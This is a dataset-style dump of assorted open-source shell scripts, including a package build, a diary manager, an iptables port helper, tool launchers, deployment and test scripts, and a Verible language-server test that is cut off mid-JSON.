blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
e0423921e34e90c1be81c4ba0059de2f53a11a46 | Shell | linuxdroid/mininix-packages | /packages/dx/build.sh | UTF-8 | 1,346 | 3.375 | 3 | [
"Apache-2.0"
] | permissive | MININIX_PKG_HOMEPAGE=http://developer.android.com/tools/help/index.html
MININIX_PKG_DESCRIPTION="Command which takes in class files and reformulates them for usage on Android"
# Version tracks the Android build-tools release the dx.jar is taken from.
MININIX_PKG_VERSION=$MININIX_ANDROID_BUILD_TOOLS_VERSION
MININIX_PKG_PLATFORM_INDEPENDENT=true
# Install step: repackage dx.jar from the SDK build-tools so it can run
# on-device, then dex it and install a launcher script.
mininix_step_make_install () {
# Rewrite packages to avoid using com.android.* classes which may clash with
# classes in the Android runtime on devices (see #1801):
local JARJAR=$MININIX_PKG_CACHEDIR/jarjar.jar
local RULEFILE=$MININIX_PKG_TMPDIR/jarjar-rule.txt
local REWRITTEN_DX=$MININIX_PKG_TMPDIR/dx-rewritten.jar
# Fetch jarjar 1.3 (mininix_download verifies the sha256 given below).
mininix_download \
http://central.maven.org/maven2/com/googlecode/jarjar/jarjar/1.3/jarjar-1.3.jar \
$JARJAR \
4225c8ee1bf3079c4b07c76fe03c3e28809a22204db6249c9417efa4f804b3a7
# Single jarjar rule: move every com.android.* class into the dx.* namespace.
echo 'rule com.android.** dx.@1' > $RULEFILE
java -jar $JARJAR process $RULEFILE \
$ANDROID_HOME/build-tools/${MININIX_PKG_VERSION}/lib/dx.jar \
$REWRITTEN_DX
# Dex the rewritten jar file:
mkdir -p $MININIX_PREFIX/share/dex
$MININIX_D8 \
--release \
--min-api 21 \
--output $MININIX_PKG_TMPDIR \
$REWRITTEN_DX
cd $MININIX_PKG_TMPDIR
jar cf dx.jar classes.dex
mv dx.jar $MININIX_PREFIX/share/dex/dx.jar
# Install the wrapper script and patch in the real installation prefix.
install $MININIX_PKG_BUILDER_DIR/dx $MININIX_PREFIX/bin/dx
perl -p -i -e "s%\@MININIX_PREFIX\@%${MININIX_PREFIX}%g" $MININIX_PREFIX/bin/dx
}
| true |
6175b882e50abbab2e69e06f9cd16712598933dd | Shell | zer0warm/personal-scripts | /diary | UTF-8 | 1,851 | 4.0625 | 4 | [] | no_license | #!/bin/bash
# Manage diaries
# j4tools provides the j4e (print message + exit) and j4po (print) helpers.
. j4tools
DIARY_PATH="$HOME/j4k1ro-stuff/diary"
DIARY_EDITOR="/Applications/MacVim.app/Contents/bin/vim"
DIARY_USAGE="Usage: $(basename $0) [--path] [on <ddmmyy> | latest | list]"
# Go to diary "warehouse" for easier interactions
mkdir -p $DIARY_PATH && cd $DIARY_PATH
DIARY_DATE=
PATH_FLAG=
SUBJ_FLAG=
# No arguments: operate on today's diary (ddmmyy).
if [[ -z "$*" ]]; then
	DIARY_DATE="$(date +%d%m%y)"
else
	# Argument loop. NOTE(review): the "list" and "help" arms neither break
	# nor shift, so they rely on j4e calling exit -- confirm, otherwise the
	# loop would never terminate for those options.
	while true; do
		case $1 in
			on)
				# Require exactly six digits (ddmmyy).
				[[ $2 =~ ^[0-9]{6}$ ]] && DIARY_DATE=$2 \
					|| j4e "$DIARY_USAGE" 1
				break
				;;
			latest)
				# Most recently modified diary; extract the date digits.
				DIARY_DATE=`ls -t *.dry | head -1 | grep -o '[0-9]\+'`
				break
				;;
			list|-l)
				# NOTE(review): this assigns SUBJ_FLAG=1 only when it is
				# already non-empty, i.e. a no-op; "-z" (or other logic)
				# was probably intended -- TODO confirm.
				if [[ -n $SUBJ_FLAG ]]; then
					SUBJ_FLAG=1
				fi
				ls -t *.dry
				j4e "\nTotal: $(ls *.dry | wc -l | bc) diaries." 0
				;;
			--path)
				PATH_FLAG=1
				shift
				;;
			--with-subjects)
				SUBJ_FLAG=1
				shift
				;;
			help|-h)
				j4e "$DIARY_USAGE" 0
				;;
			*)
				j4e "$DIARY_USAGE" 1
				;;
		esac
	done
fi
DIARY_NAME="note$DIARY_DATE.dry"
# If file exists, we are modifying its content
[[ -f "$DIARY_NAME" ]] && MOD_FLAG=1
# If file exists and --path was issued, print path to file and exit.
[[ -n $MOD_FLAG && -n $PATH_FLAG ]] && j4e "$DIARY_PATH/$DIARY_NAME" 0
# NOTE(review): duplicates the check above, and the "No context" j4e call
# passes no exit-status argument unlike every other call site -- confirm.
if [[ -n $PATH_FLAG ]]; then
	[[ -n $MOD_FLAG ]] && j4e "$DIARY_PATH/$DIARY_NAME" 0 \
		|| j4e "$(basename $0): No context for --path"
fi
# Open the diary file
$DIARY_EDITOR $DIARY_NAME
if [[ -f "$DIARY_NAME" ]]; then
	# Compare Unix timestamp of the file last modified and current time
	# NOTE(review): equality only holds when the save happened within the
	# same second as this check; any earlier save reports "No new changes"
	# -- verify this heuristic is intended.
	if [[ "$(date -r $DIARY_NAME +%s)" != "$(date +%s)" ]]; then
		j4po "No new changes recorded for diary <$DIARY_NAME>.\n"
	elif [[ ! -z $MOD_FLAG ]]; then
		j4po "Diary <$DIARY_NAME> had just been updated.\n"
	else
		j4po "Diary <$DIARY_NAME> had just been added.\n"
	fi
else
	j4po "Diary <$DIARY_NAME> discarded. No new file added.\n"
fi
# Get back to where we were at
cd $OLDPWD
| true |
5662464dc016d7d88adaf6abeb5dc5b52a5b40bb | Shell | ghl2009/test_others | /iptables+9207.sh | UTF-8 | 484 | 3.40625 | 3 | [] | no_license | #!/bin/bash
# Clone the existing ACCEPT rule for port 9311 into an equivalent rule for
# port 9207 in the static iptables config, then restart the service.
iptables_conf='/etc/sysconfig/iptables'
grep_9207=`grep 'dport 9207' $iptables_conf`
# Already present: nothing to do.
if [[ $grep_9207 ]];then
echo "Iptables has 9207 ports"
exit
else
echo $iptables_conf
# Line number of the template 9311 rule.
# NOTE(review): if 'dport 9311' matches more than one line, rownum and
# ACCEPT_9207 become multi-line and the sed append below misbehaves --
# confirm the config only ever contains a single such rule.
rownum=`grep -n 'dport 9311' $iptables_conf|awk -F ':' '{print $1}'`
echo $rownum
# Same rule text with the port swapped to 9207.
ACCEPT_9207=`grep 'dport 9311' $iptables_conf|sed 's/9311/9207/'`
echo $ACCEPT_9207
# Append the new rule directly after the 9311 rule.
sed -i "${rownum}a ${ACCEPT_9207}" $iptables_conf
service iptables restart
echo 'Iptables added 9207 ports successfully'
fi
| true |
c29aee08085f9db5b679d269272025e3471f435d | Shell | dualbus/bashly | /tests/cmdline.bashly/001-test-cmdline-arguments-short | UTF-8 | 841 | 3.109375 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
: load cmdline
# Run the command given in "$@" and summarise its two output channels as
# "<stdout>:<fd3-as-hex>".  stdout is expected to carry a numeric shift
# count; whatever the command writes to file descriptor 3 is rendered as a
# whitespace-free hex string via od.  The command is invoked twice, once
# per channel.
r() {
	typeset consumed fd3_hex
	# First pass: capture stdout (the count), discard fd 3.
	consumed=$("$@" 3>/dev/null)
	# Second pass: capture fd 3 (dup'ed onto stdout), discard real stdout,
	# then hex-encode the bytes and strip all whitespace from od's output.
	fd3_hex=$("$@" 3>&1 >/dev/null | od -An -v -t x1 | tr -d '[:space:]')
	printf '%u:%s' "$consumed" "$fd3_hex"
}
# Exercise cmdline__p__arguments__short (loaded from the cmdline module)
# against several short-option scenarios; returns 0 when all checks pass.
# short_map / arguments_map are the module's option tables: short flag ->
# canonical name, and canonical name -> number of required arguments.
function test {
typeset -A short_map
typeset -A arguments_map
# "-x a": option x consumes one argument; expect shift count 1 and the
# fd-3 payload 78 20 61 00 (bytes 'x', ' ', 'a', NUL).
short_map=(['x']=x) arguments_map=(['x']=1)
[[ $(r cmdline__p__arguments__short -x a) = '1:78206100' ]] || return 1
: 'missing arguments'
# Option declares two required arguments but only one is given: status 4.
short_map=(['x']=x) arguments_map=(['x']=2)
cmdline__p__arguments__short -x a >/dev/null 3>&1
(($? == 4)) || return 1
: 'unspecified option'
# Option not present in the maps at all: status 3.
short_map=() arguments_map=()
cmdline__p__arguments__short -x a >/dev/null 3>&1
(($? == 3)) || return 1
: 'unspecified option (which)'
# Same, but checking what gets reported on fd 3:
# 2d 20 2d 78 00 are the bytes '-', ' ', '-', 'x', NUL.
short_map=() arguments_map=()
[[ $(r cmdline__p__arguments__short -x a) = '0:2d202d7800' ]] || return 1
return 0
}
test
| true |
4da14266b7eec4f670974481513ec00d2ce0210c | Shell | IPv4v6/burp-suite-stuff | /scripts/download-burp-community.sh | UTF-8 | 336 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env bash
# Download a pinned Burp Suite Community release for Linux and verify its
# published SHA-256 checksum; a mismatch makes sha256sum fail and, via
# set -e, aborts the script with a non-zero status.
set -e
set -u
VERSION="2023.7"
FILE="burpsuite_community_linux_v${VERSION}.sh"
SHA256="5cbe3a46e0de3f228eca89943c7f98258034f42be2dbe3ee98b26116de9f1e57"
# -R preserves the server-side timestamp on the downloaded file.
curl -R -o ${FILE} \
"https://portswigger.net/burp/releases/download?product=community&version=${VERSION}&type=linux"
# NOTE(review): GNU sha256sum -c expects two characters (e.g. two spaces)
# between hash and filename -- confirm the separator below is correct.
echo "${SHA256} ${FILE}" | sha256sum -c -
| true |
4b10cbae4bba498833e2b25c6d7bdfef42472a40 | Shell | Todai88/bth_linux | /kmom03/script/if_1.bash | UTF-8 | 109 | 3.078125 | 3 | [] | no_license | #!/bin/bash
# Demo: report whether the first positional argument is greater than 5.
# NOTE(review): with no argument (or a non-numeric one) the arithmetic
# expression errors out and the else branch runs -- presumably acceptable
# for a teaching example; confirm.
if (($1 > 5));
then
echo "$1 is greater than 5";
else
echo "$1 is NOT greater than 5";
fi;
| true |
ce80d38c9a6092e06b75bb270dab66bac30ff35c | Shell | Jiangkm3/dotfile | /.config/polybar/ibus_show.sh | UTF-8 | 202 | 2.546875 | 3 | [] | no_license | #!/bin/bash
# Print a two-letter label for the active ibus input engine (for polybar).
IM=$(ibus engine)
if [[ $IM =~ eng$ ]]; then
echo EN
exit 0
elif [[ $IM =~ pinyin$ ]]; then
echo ZH
exit 0
elif [[ $IM =~ ger$ ]]; then
echo DE
exit 0
fi
# Unknown engine: print a placeholder and exit non-zero.
echo N/A
# NOTE(review): exit codes are 0..255; "exit -1" is reported as 255.
exit -1
| true |
35560aa689464bde6933958b454616632ad084cd | Shell | dmalyuta/config-public | /.local/bin/whatsapp-web | UTF-8 | 232 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Open WhatsApp Web in Chrome.  With a whatsapp:// URL argument, rewrite it
# to the equivalent https://web.whatsapp.com/ URL and open that; with no
# arguments, open WhatsApp Web as a dedicated app window.
if (($# > 0)); then
    # Map the custom URL scheme onto the web frontend.
    whatsapp_web_url="$(sed -E 's|whatsapp://|https://web.whatsapp.com/|' <<< "$1")"
    exec google-chrome-home "${whatsapp_web_url}"
fi
exec google-chrome-home --app='https://web.whatsapp.com/'
| true |
cc90c7f1431845e4538ec7021a5b709e81c8e381 | Shell | TerryGuo/wasmjit-perf | /compile.bash | UTF-8 | 245 | 2.625 | 3 | [
"MIT"
] | permissive | sudo apt install g++
# Compile one C++17 source file with pthread support into an optimised
# binary.  Usage: compile.bash [srcfile] [output-subdir]
# Defaults: eosvm_jit.cpp compiled into the current directory.
srcfile=$1
# NOTE(review): this first assignment of dir is unconditionally overwritten
# two lines below -- confirm it can be removed.
dir=$2
[[ "$srcfile" == "" ]] && srcfile="eosvm_jit.cpp"
[[ "$dir" == "" ]] && dir=$(pwd) || dir=$(pwd)/$2
# Output binary named after the source file, minus its extension.
outputfile=${dir}/${srcfile%.*}
g++ $srcfile -I eos-vm/include/ -std=gnu++17 -lpthread -o $outputfile -O3
| true |
7f20d2f2f16f6a3888e1ff8769991ecbacaf562a | Shell | dmap-group/resources | /scripts/codmap/distributed/planner1/plan.sh | UTF-8 | 1,787 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# This script acts as an unified running interface of your planner process (all planners will have
# similar script). During the competition this script will be used by our infrastructure to run your
# planner. In this testing environment, the run.sh script in your team's home dir calls this plan.sh
# scripts distributively to demonstrate running of your planner.
#
# parameters: plan.sh <domain-file> <problem-file> <agent-name> <agent-ip-file> <output-file>
# example: ./plan.sh ../benchmarks/factored/driverlog/pfile1/domain-driver1.pddl \
# ../benchmarks/factored/driverlog/pfile1/problem-driver1.pddl \
# driver1 ../agent-ip.list ../plan.out
#
# <domain-file>: file name of the domain the planner should be run for
#
# <problem-file>: file name of the problem in the domain <domain-file> the planner should plan with
#
# <agent-name>: name of the agent this planning process plans for
#
# <agent-ip-file>: file name of the list of agents and their IP adresses
#
# <output-file>: file the planner should write the resuting plan in
#
# Note: If your planner needs to run some other service(s) before, this is the right place to do it
# (e.g., message brokers, etc.). The running time is computed including this script. If you need to
# run the additional service only once for one planning problem, you has to check if this is the IP
# address of the primary process. The distributed planners are allowed to use only the factored
# benchmarks in ../benchmarks/factored (the unfactored version is only for use by ma-to-pddl.py).
# See more information in the CoDMAP rules at http://agents.fel.cvut.cz/codmap/.
# *************** REPLACE BY CODE RUNNING YOUR PLANNER ***************
# Mockup invocation: forwards <domain-file> <problem-file> <agent-name>
# <agent-ip-file> <output-file> straight to the bundled dummy planner.
./mockup-dist-planner $1 $2 $3 $4 $5
| true |
f7b4bc88a15f54161a480b7f404f907a6e1054d8 | Shell | sandance/k8s-crds | /website-operator-sdk/deploy-operator.sh | UTF-8 | 1,430 | 4.03125 | 4 | [] | no_license | #!/usr/bin/env bash
deleteAndCreate=true
runLocal=false
operatorName="website-operator"
namespace="default"
image=architechbootcamp/website-operator:1.0.0
function log {
echo "deploy-operator.sh --> $*"
}
function usage {
log "To build, push, and deploy the operator to a cluster: ./deploy-operator.sh"
log "To build, push, run operator locally: ./deploy-operator.sh -l"
}
while getopts ":l:" opt; do
case $opt in
l)
runLocal=true
log "will run operator locally"
;;
\?) #invalid option
log "${OPTARG} is not a valid option"
usage
exit 1
;;
esac
done
if [ -z "$image" ] ; then log "docker image must be provided"; exit 1; fi
log "building the operator with image tag ${image}"
operator-sdk build "$image"
log "pushing operator image ${image}"
docker push "$image"
if [ "$deleteAndCreate" = true ]; then
log "deleting the existing CRD"
kubectl delete -f ./deploy/crds/example_v1beta1_website_crd.yaml
fi
log "creating Website CRD"
kubectl create -f ./deploy/crds/example_v1beta1_website_crd.yaml
if [ "$runLocal" = true ]; then
log "running operator locally"
export OPERATOR_NAME="$operatorName"
operator-sdk up local --namespace "$default"
else
log "deploying operator to the cluster"
kubectl delete -f ./deploy/operator.yaml
kubectl create -f ./deploy/operator.yaml
fi | true |
22cbee71d8fa7506ff2891f93dac54f700414b59 | Shell | pcingola/SnpEff | /scripts_build/pdbCompoundLines.sh | UTF-8 | 177 | 3.046875 | 3 | [
"MIT"
] | permissive | #!/bin/sh -e
# For every gzipped PDB entry (*.ent.gz) under the given directory, stream
# its decompressed contents through pdbCompoundLines.py together with the
# PDB id derived from the file name.
# Usage: pdbCompoundLines.sh <dir>
dir=$1
scripts=$(dirname "$0")
# Fix: previously iterated "for pdb in `find ...`", which word-splits and
# breaks on paths containing whitespace; read the results line by line.
find "$dir" -iname "*.ent.gz" | while IFS= read -r pdb
do
	pdbId=$(basename "$pdb" .ent.gz)
	gunzip -c "$pdb" | "$scripts"/pdbCompoundLines.py "$pdbId"
done
| true |
b1a5c6760ca43ac507581dc9914033f82aea09c8 | Shell | gpascualg/ScientificDocker | /scripts/delete_user.sh | UTF-8 | 860 | 4.03125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# Tear down a user's containerised environment: remove the generated run
# script and SSH key pair, then stop and delete the docker container.
RUNPATH=$(realpath $(dirname "$0")/..)
. $RUNPATH/scripts/utils.sh
# handle non-option arguments
if [[ $# -ne 1 ]]; then
echo "$0: A name is required."
exit 1
fi
USERNAME=$1
USERFILE=$RUNPATH/run_files/run_$USERNAME.sh
# The per-user run script is the marker that the user exists.
if [ ! -f $USERFILE ]
then
echo "This user does not exist"
exit 2
fi
# Probe docker access; fails for callers lacking docker permissions.
if ! docker stats --no-stream &>/dev/null
then
echo "User does not have permission to run docker, please use sudo"
exit 3
fi
# negconfirm comes from utils.sh; presumably it prompts the operator and
# succeeds when they decline, aborting the deletion -- verify in utils.sh.
negconfirm && exit 4
rm -f $USERFILE
rm -f $RUNPATH/ssh_keys/$USERNAME
rm -f $RUNPATH/ssh_keys/$USERNAME.pub
# Best-effort container teardown: failures are reported but not fatal.
if docker stop $USERNAME &>/dev/null
then
echo "Docker stopped"
else
echo "Could not stop docker, maybe it was not running at all?"
fi
if docker rm $USERNAME &>/dev/null
then
echo "Docker removed"
else
echo "Could not remove docker, maybe it was never started?"
fi
echo "Done"
| true |
6eb4f65a0681d4bcea7fb4b7dbbd74289e77bdb5 | Shell | chanmingkin72/Node.js-FromTheBeginning | /rest/system/wspd_cgi.sh | UTF-8 | 2,980 | 3.671875 | 4 | [] | no_license | #!/bin/sh
#/**************************************************************/
#/* Copyright (c) 1997 by Progress Software Corporation */
#/* */
#/* All rights reserved. No part of this program or document */
#/* may be reproduced in any form or by any means without */
#/* permission in writing from Progress Software Corporation. */
#/**************************************************************/
#
# WebSpeed CGI Messenger startup script - UNIX Version
# This is a sample of the CGI-based WebSpeed Messenger
# (cgiip) startup script for UNIX. The two environment
# variables: DLC, PROMSGS must be defined for cgiip to
# operate properly. Normally, this shell script
# would reside in the Web Server's scripts directory (e.g. cgi-bin)
# and would be specified in a URL, for example:
# http://hostName/cgi-bin/wspd_cgi.sh/web/src/examples/runscrpt.w
#
# The cgiip executable can be started in a number of ways:
#
# 1. cgiip <host_name> <port_number>
# where: host_name/port_number is the location of a WebSpeed
# Broker or Dispatcher service, this is WebSpeed v1.0
# compatibility.
#
# 2. cgiip -i <WS_service>
# where: WS_service is a WebSpeed Broker or Dispatcher service
# as defined in the WebSpeed property file
# $DLC/ubroker.properties
#
# 3. cgiip
# Started with no arguments. This instructs cgiip to use
# the default service (defaultService) as defined in the
# WebSpeed property file $DLC/ubroker.properties
#
# 4. cgiip -f <properties file>
# Started with a specific property file, this overrides the
# default property file ($DLC/ubroker.properties). If
# -i <WS_service> is specified that service name in
# the <properties file> will be used. If -i <WS_service>
# is not specified then the default service
# (defaultService) must be set in <properties files>.
#
# Determine the correct directory where the Messenger
# is installed from either the tailored name or existing value of $DLC.
for what_dlc in "$DLC" "/usr/dlc"
do
[ ! -f "${what_dlc}/bin/cgiip" ] && continue
DLC=$what_dlc
export DLC
break
done
# Set PROMSGS (if not set)
PROMSGS=${PROMSGS-$DLC/promsgs}; export PROMSGS
# Set the user working directory - this is a tailored value
WRKDIR=${WRKDIR-"/usr/wrk"}; export WRKDIR
# option 1 using host_name and port_num
# $DLC/bin/cgiip pegasus 5001
# option 2 using a service name defined in $DLC/ubroker.properties
$DLC/bin/cgiip -i wsbroker1
# option 3 the "defaultService" defined in $DLC/ubroker.properties
# $DLC/bin/cgiip
# option 4 using a specific properties file name
# $DLC/bin/cgiip -i wsbroker1 -f ./mybroker.properties
# option 5 using a specific properties file name with the "defaultService"
# $DLC/bin/cgiip -f ./mybroker.properties
| true |
3dd8ba2a6772d855be61801799e228d7e89ca9dc | Shell | viin-hub/NCCTSegmentation | /dcm2nii.sh | UTF-8 | 611 | 2.84375 | 3 | [] | no_license | #!/bin/bash
#!/bin/bash
# For each DICOM series directory listed (one absolute path per line) in the
# CSV named below, recreate its last three path components under $targetDir
# and run dcm2niix to convert the series to NIfTI there.
#
# Fix: the loop previously used IFS='\n', which sets IFS to the two literal
# characters backslash and "n" (not a newline) and strips them from line
# ends; IFS= preserves each line verbatim.  Expansions are now quoted so
# paths with spaces survive.
while IFS= read -r s
do
	fn0=$(basename "$s")       # series directory name
	part1=$(dirname "$s")
	part2=$(dirname "$part1")
	fn1=$(basename "$part1")   # study-level directory
	fn2=$(basename "$part2")   # subject-level directory
	targetDir="/home/miranda/Documents/data/INSPIRE/subtype/V7.1"
	niftidir="${targetDir}/$fn2/$fn1/$fn0"
	mkdir -p "$niftidir"
	# Skip entries whose source directory is missing rather than running
	# dcm2niix from whatever directory we happened to be in.
	cd "$s" || continue
	/home/miranda/Downloads/MRIcroGL_linux/MRIcroGL/Resources/dcm2niix -o "$niftidir" -f %p_%s -g y "$s"
done < /home/miranda/Documents/data/INSPIRE/subtype/subtype_INSPIRE_dcm_folders.csv
9ab366288796ea060484c7a7a0bd1312017ec658 | Shell | cerobit/shared | /bash/dot_prompt | UTF-8 | 1,357 | 3.375 | 3 | [] | no_license | declare -r MAX_PATH_LENGTH=40
# Ask git's __git_ps1 helper to mark dirty worktrees in the branch name.
declare -r GIT_PS1_SHOWDIRTYSTATE=true
# ANSI colour fragments, wrapped in \[ \] so readline excludes them from
# the prompt-width calculation.
declare -r COLOR_PATH="\[\e[34;1m\]"
declare -r COLOR_EXTRAS="\[\e[35m\]"
declare -r COLOR_USER=""
declare -r COLOR_ROOT="\[\e[1;31;40m\]"
declare -r COLOR_HOST=""
declare -r COLOR_RESET="\[\e[0m\]"
# Abbreviate an over-long working-directory string for the prompt.  Paths
# longer than MAX_PATH_LENGTH keep only their tail; the truncated leading
# component is replaced by "(...)", and a "~/" prefix is restored for paths
# that referenced $HOME.
function prompt_path {
  local shown="$1"
  local lead=""
  if [[ "$shown" == *~* ]]; then
    lead="~/"
  fi
  if (( ${#shown} > MAX_PATH_LENGTH )); then
    # Keep the last (MAX_PATH_LENGTH - len(lead)) characters...
    shown=${shown: -$(( MAX_PATH_LENGTH - ${#lead} ))}
    # ...and swap the now-partial first component for the "(...)" marker.
    if [[ "$shown" =~ ^[^/]*/(.*) ]]; then
      shown="${lead}(...)${BASH_REMATCH[1]}"
    fi
  fi
  echo $shown
}
# Emit " [branch]" for the current git repository, or nothing when outside
# a repo or when the __git_ps1 helper (from git's shell integration) is
# not loaded.
function prompt_git {
  [[ $(type -t __git_ps1) ]] || return
  local branch="$(__git_ps1 '%s')"
  if [[ ! -z "$branch" ]]; then
    echo " [$branch]"
  fi
}
# Emit " [interpreter-version@gemset]" via rvm-prompt, or nothing when rvm
# is not installed for this user.
function prompt_rvm {
  [[ -f ~/.rvm/bin/rvm-prompt ]] || return
  echo " [$(~/.rvm/bin/rvm-prompt i v g s)]"
}
# Render a " [N job/jobs]" fragment for the prompt, or nothing when the
# given job count is zero.
function prompt_jobs {
  local count=$1
  # Nothing to show when there are no background jobs.
  if [[ "$count" == 0 ]]; then
    return
  fi
  local noun="jobs"
  if [[ "$count" == 1 ]]; then
    noun="job"
  fi
  echo " [$count $noun]"
}
# Root gets the warning colour on the username; everyone else the default.
declare color_by_id
case $EUID in
  (0) color_by_id=$COLOR_ROOT ;;
  (*) color_by_id=$COLOR_USER ;;
esac
# Prompt shape: "( user@host:path [rvm] [git-branch] [N jobs] )" then "$ "
# on the next line.  The prompt_* helpers are re-evaluated at display time
# via the escaped \$(...) substitutions.
PS1="$COLOR_RESET( $color_by_id\u$COLOR_RESET@$COLOR_HOST\h$COLOR_RESET:$COLOR_PATH\$(prompt_path '\w')$COLOR_RESET$COLOR_EXTRAS\$(prompt_rvm)\$(prompt_git)\$(prompt_jobs \j)$COLOR_RESET )\n\$ "
# vim: set filetype=sh :
| true |
15438cd7d8b816dc2253706859b74b0ad8186cc9 | Shell | snsokolov/verible | /verilog/tools/ls/verible-verilog-ls_test.sh | UTF-8 | 8,751 | 3.03125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Copyright 2021 The Verible Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -u
# Positional args: $1 = path of the language-server binary, $2 = path of
# the json-rpc-expect checker; both are resolved through Bazel's rlocation.
[[ "$#" == 2 ]] || {
  echo "Expecting 2 positional arguments: lsp-server json-rpc-expect"
  exit 1
}
LSP_SERVER="$(rlocation ${TEST_WORKSPACE}/$1)"
JSON_RPC_EXPECT="$(rlocation ${TEST_WORKSPACE}/$2)"
# Scratch files, kept under Bazel's test tmpdir when available.
TMP_IN=${TEST_TMPDIR:-/tmp/}/test-lsp-in.txt
JSON_EXPECTED=${TEST_TMPDIR:-/tmp/}/test-lsp-json-expect.txt
MSG_OUT=${TEST_TMPDIR:-/tmp/}/test-lsp-out-msg.txt
# One message per line, converted by the awk script to header/body.
# Starting up server, sending two files, a file with a parse error and
# a file that parses, but has a EOF newline linting diagnostic.
#
# We get the diagnostic messages for both of these files, one reporting
# a syntax error, one reporting a lint error.
#
# We then modify the second file and edit the needed newline at the end of
# the buffer, and then get an update with zero diagnostic errors back.
#
# TODO: maybe this awk-script should be replaced with something that allows
# multi-line input with comment.
awk '/^{/ { printf("Content-Length: %d\r\n\r\n%s", length($0), $0)}' > ${TMP_IN} <<EOF
{"jsonrpc":"2.0", "id":1, "method":"initialize","params":null}
# Testing a file with syntax errors: this should output some diagnostic
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://syntaxerror.sv","text":"brokenfile\n"}}}
# Let's manually request these diagnostics
{"jsonrpc":"2.0", "id":2, "method":"textDocument/diagnostic","params":{"textDocument":{"uri":"file://syntaxerror.sv"}}}
# A file with a lint error (no newline at EOF). Then editing it and watching diagnostic go away.
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://mini.sv","text":"module mini();\nendmodule"}}}
# Requesting a code-action exactly at the position the EOF message is reported.
# This is an interesting special case, as the missing EOF-newline is an empty
# range, yet it should be detected as overlapping with that diagnostic message.
{"jsonrpc":"2.0", "id":10, "method":"textDocument/codeAction","params":{"textDocument":{"uri":"file://mini.sv"},"range":{"start":{"line":1,"character":9},"end":{"line":1,"character":9}}}}
{"jsonrpc":"2.0","method":"textDocument/didChange","params":{"textDocument":{"uri":"file://mini.sv"},"contentChanges":[{"range":{"start":{"character":9,"line":1},"end":{"character":9,"line":1}},"text":"\n"}]}}
{"jsonrpc":"2.0", "id":11, "method":"textDocument/documentSymbol","params":{"textDocument":{"uri":"file://mini.sv"}}}
{"jsonrpc":"2.0","method":"textDocument/didClose","params":{"textDocument":{"uri":"file://mini.sv"}}}
# Attempt to query closed file should gracefully return an empty response.
{"jsonrpc":"2.0", "id":12, "method":"textDocument/documentSymbol","params":{"textDocument":{"uri":"file://mini.sv"}}}
# Highlight, but only symbols not highlighting 'assign' non-symbol.
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://sym.sv","text":"module sym();\nassign a=1;assign b=a+1;endmodule\n"}}}
{"jsonrpc":"2.0", "id":20, "method":"textDocument/documentHighlight","params":{"textDocument":{"uri":"file://sym.sv"},"position":{"line":1,"character":7}}}
{"jsonrpc":"2.0", "id":21, "method":"textDocument/documentHighlight","params":{"textDocument":{"uri":"file://sym.sv"},"position":{"line":1,"character":2}}}
# Formatting a file
{"jsonrpc":"2.0","method":"textDocument/didOpen","params":{"textDocument":{"uri":"file://fmt.sv","text":"module fmt();\nassign a=1;\nassign b=2;endmodule\n"}}}
{"jsonrpc":"2.0", "id":30, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":1,"character":0},"end":{"line":2,"character":0}}}}
{"jsonrpc":"2.0", "id":31, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":1,"character":0},"end":{"line":1,"character":1}}}}
{"jsonrpc":"2.0", "id":32, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":2,"character":0},"end":{"line":2,"character":1}}}}
{"jsonrpc":"2.0", "id":33, "method":"textDocument/rangeFormatting","params":{"textDocument":{"uri":"file://fmt.sv"},"range":{"start":{"line":1,"character":0},"end":{"line":3,"character":0}}}}
{"jsonrpc":"2.0", "id":34, "method":"textDocument/formatting","params":{"textDocument":{"uri":"file://fmt.sv"}}}
{"jsonrpc":"2.0", "id":100, "method":"shutdown","params":{}}
EOF
# TODO: change json rpc expect to allow comments in the input.
cat > "${JSON_EXPECTED}" <<EOF
[
{
"json_contains": {
"id":1,
"result": {
"serverInfo": {"name" : "Verible Verilog language server."}
}
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://syntaxerror.sv",
"diagnostics":[{"message":"syntax error"}]
}
}
},
{
"json_contains": {
"id":2,
"result": {
"kind":"full",
"items":[{"message":"syntax error"}]
}
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://mini.sv",
"diagnostics":[{"message":"File must end with a newline.","range":{"start":{"line":1,"character":9}}}]
}
}
},
{
"json_contains": {
"id":10,
"result": [
{"edit": {"changes": {"file://mini.sv":[{"newText":"\n"}]}}}
]
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://mini.sv",
"diagnostics":[]
}
}
},
{
"json_contains": {
"id":11,
"result": [
{"kind":6, "name":"mini"}
]
}
},
{
"json_contains":{
"id":12 ,
"result": []
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://sym.sv",
"diagnostics":[]
}
}
},
{
"json_contains":{
"id":20,
"result": [
